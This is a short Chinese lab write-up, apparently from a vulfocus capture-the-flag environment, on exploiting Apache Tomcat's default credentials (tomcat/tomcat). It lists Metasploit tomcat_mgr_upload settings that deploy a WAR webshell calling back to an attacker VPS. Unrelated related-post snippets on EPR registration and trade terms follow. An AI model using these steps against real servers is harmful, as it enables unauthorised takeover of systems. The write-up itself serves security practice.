tomcat弱口令

Zab Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署war包geshell。

漏洞编号:

影响版本:
弱口令

复现步骤:
1,打开漏洞环境vulfocus

2,访问URL点击Manager App

3,验证弱口令,输入默认账号密码tomcat tomcat

4,使用msf进入exploit/multi/http/tomcat_mgr_upload模块

5,依次设置

set rhost vulfocus.fofa.so set rport 60231 set httpusername tomcat set httppassword tomcat set lhost VPS IP set lport 6666

6,run

7,查看flag

想了解更多关于tomcat弱口令的内容,请扫微信
或微信搜索jiemingpan

本文链接:http://www.soufuzi.com/jianzhan/2308

(0)
上一篇 2024-07-19 23:06:40
下一篇 2024-07-19 23:06:40

相关推荐

  • 什么是EPR注册号?

    一、EPR注册号的定义与背景 EPR,即Extended Producer Responsibility,意为“生产者延伸责任”,是一项环境保护政策,旨在鼓励生产商对产品全生命周期的环境影响承担责任。EPR注册号则是生产商在履行这一责任时获得的唯一标识码,用于证明其已按规定进行环保注册和申报。 在欧洲等发达国家和地区,EPR政策已得到广泛应用。例如,德国早在1991年便引入了包装废弃物处理的EPR制度。随着环保意识的增强和国际

    2024-06-24 09:33:13
  • fob、cif、cfr的区别

    相同点: 1.交货性质相同:都是凭单交货,凭单付款象征似交货 2.运输方式相同:都是适用于水上运输 3.风险转移点相同:都是装运港货物越过船舷 4.办理出,进口清关手续相同:出口手续卖方办理;进口手续买方办理 5.成交方式相同:签订的都属于装运合同 不同点: 1.运输责任、费用不同:①FOB:买方   ②CFR、CIF:卖方

    2024-12-05 15:26:35